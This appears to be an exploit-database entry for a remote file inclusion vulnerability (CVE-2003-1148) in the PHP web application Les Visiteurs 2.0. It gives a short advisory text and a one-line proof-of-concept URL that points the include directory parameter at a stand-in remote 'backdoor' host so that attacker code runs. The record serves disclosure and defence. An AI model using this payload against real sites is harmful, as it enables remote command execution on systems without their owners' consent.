Les Visiteurs 2.0 - Remote File Inclusion
Author: Matthieu Peschaud
type: webapps
platform: php
port:
date_added: 2003-10-27
date_updated: 2012-12-11
verified: 1
codes: CVE-2003-1148;OSVDB-3586
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8902/info
A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system.
http://www.example.com/path/include/config.inc.php?lvc_include_dir=http://backdoor/